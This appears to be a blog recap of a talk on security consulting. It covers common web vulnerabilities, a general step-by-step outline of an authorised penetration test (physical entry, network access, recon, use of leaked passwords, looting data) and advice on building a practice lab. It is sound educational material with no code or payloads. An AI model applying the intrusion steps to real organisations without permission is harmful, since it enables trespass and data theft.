On Wednesday Peter and Sam from Quantum security broke down the basics of being a security consultant and showed us just how easy it is to get around what most people forget in system security, the basics.
What does a Security Consultant do?
Not all of security consultancy is about tech. There are heaps of different people in security consultancy and heaps of different tasks. A lot of what we hear about these days is Penetration Testing, or pen testing. The reality is that we also do other things like compliance checking, risk assessments, audits and design review. We test a wide range of things, everything from web apps and credit card organisations to self service kiosks and IaaS providers.
What do we commonly see?
XSS or Cross-Site Scripting is one of the most common and is found in around 1/3 applications. It is usually because of poor input validation that allows the attacker to get the victim to run any code that they want from a text input.
SQL Injection is another very common exploit and is also the fault of poor input validation. Improper validation can allow attackers to run any code that they want from within the database, even system commands which can allow you to take over the server.
Broken Auth and Access Control is another exploit and is often broken in the simplest ways. The key thing to note here is that all of these things are some of the easiest to avoid. Most languages and frameworks have built in functions that check all of these inputs for you. If you’re interested in some other really common exploits check out the OWSAP Top Ten.
Hacking Day to Day
1. The first step as always with any form of hacking is to get permission from your target. It’s the most crucial step of the process.
2. The second step is to do background research. This might involve looking through existing password dumps or looking for domains that the target might be trying to hide.
3. The next step is walking into the building and make sure you make it look like you’re supposed to be there
4. You then want to try and get access to their network. Most offices don’t have port security so you can usually plug into any ethernet port and get full access. Most offices also have guest WiFi.
5. Recon is your next step and it’s all about finding whats on the network. You can use network scans, vulnerability scans and active directory to see what users are on the network.
6. The next step is gaining access, the best thing to do is make use of details that have already been exposed like leaked passwords and running known exploits.
7. Loot everything. Take anything that you can get your hands on, anything that will help the victim realise the impact vulnerability you’ve exploited. Take business secrets, money and passwords.
8. The last thing is writing the report, after all if you can’t explain what you did and how to fix it then all you have done is shown there is an issue.
What is a lab and why should you get one?
A lab is an environment that can be used for testing something without having to test on a real product. So why would you want a lab when you could just test on real targets? The first thing you should do when penetration testing is ask for permission if you don’t own it. If you own it then you only need to ask yourself. The best thing about having unlimited access to a lab is that you’re able to freely test out exploits, get a better understanding of how they work and potentially even make some money.
Setting up a lab
The easiest way to set up a lab is with virtual machines. That way you don’t have to fork out lots of money to get multiple physical machines. The two key parts of a lab are the attacker, the machine you want to launch exploits from, and a victim, the machine you want to try exploits on. The last thing that you’ll need is a bunch of tutorials or some exploits to try out. Here are some of a few things that can get you started. T
here are some purpose built attackers that you can use. The most common one is Kali Linux, and it’s the one used at Quantum, theres also Metasploit, and multiple tools that can be found on GitHub. If you’re targeting Windows machines then SysInternalsis a good choice.
The next thing is something you can exploit. Some of the common targets people use are WebGoat, Metasploitable and VulnHub.